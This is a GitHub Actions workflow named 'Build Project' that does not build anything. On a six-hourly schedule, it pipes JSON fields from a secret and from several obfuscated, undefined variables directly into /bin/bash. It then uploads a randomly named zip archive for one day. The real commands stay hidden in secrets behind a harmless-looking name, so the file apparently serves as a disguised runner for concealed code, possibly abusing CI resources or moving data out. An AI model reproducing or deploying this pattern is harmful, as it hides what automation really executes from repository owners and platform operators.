name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '44 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          u27482: ${{ secrets.u27482 }}
        run: |
          printf '%s' "$u27482" | jq -r .gtli059 | /bin/bash
          printf '%s' "$ccvu1448" | jq -r .mnbi45 | /bin/bash
          printf '%s' "$px5" | jq -r .fx2354 | /bin/bash
          printf '%s' "$jvd7004" | jq -r .nv1478 | /bin/bash
          echo $getw0598 | jq -r .na32 | /bin/bash
          echo $ce12819 | jq -r .yqhjv461 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Fk2ru7Zq
          path: "*.zip"
          retention-days: 1
